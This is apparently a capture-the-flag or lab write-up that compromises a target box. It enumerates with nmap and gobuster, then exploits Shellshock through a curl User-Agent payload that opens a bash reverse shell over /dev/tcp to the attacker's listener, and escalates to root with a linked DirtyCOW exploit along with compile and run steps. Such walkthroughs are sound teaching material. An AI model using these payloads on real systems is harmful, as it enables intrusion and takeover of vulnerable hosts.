Alright! Another day, another box! Let’s hit it with nmap.
kali@kali:~/work$ nmap -p- target
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:46 MDT
Nmap scan report for target (work)
Host is up (0.068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 48.97 secondsCool cool, nothing on HTTP but OpenSSH is an extremely old version.
After a lot of effort, we decide to look at HTTP again.
kali@kali:~/work$ gobuster dir -u http://target/cgi-bin -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://target/cgi-bin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 286]
/.htaccess (Status: 403) [Size: 291]
/.htpasswd (Status: 403) [Size: 291]
/test (Status: 200) [Size: 14]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================This is a lesson learned the hard way. Always scan major subdirectories, even if they themselves return 404.
kali@kali:~/work$ curl http://target/cgi-bin/test
CGI Default !Okay, let’s try shellshock in the user agent.
kali@kali:~/work$ curl -A "() { :;}; /bin/bash -i > /dev/tcp/me/4444 0<&1 2>&1" http://target/cgi-bin/testBoom, shell.
kali@kali:~/work$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on target 47561
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$One of the first things you’ll see hackers do on a new system is run ‘uname -a’ to see what version of the kernel we’re dealing with. Let’s copy them.
www-data@ubuntu:/usr/lib/cgi-bin$ uname -a
uname -a
Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/LinuxAlright, so looking up this kernel version, we see it’s vulnerable to DirtyCOW.
DirtyCOW is a copy-on-write vulnerability in the linux kernel from versions 2.6.22 to 4.8.3 (with some backpatching depending on distro). To exploit this, I’ve written some code found at https://github.com/NekointheShell/exploits/blob/main/linux/2.6.22-4.8.3/privesc/dirtycow.c heavily based on 40616 from exploit-db. Read it. Mine has comments to tell you what’s going on. Compile it with ‘gcc -static dirtycow.c -o dirtycow’, copy it to the box, then run it with a suid binary as its argument.
And like that, we’ve rooted yet another box.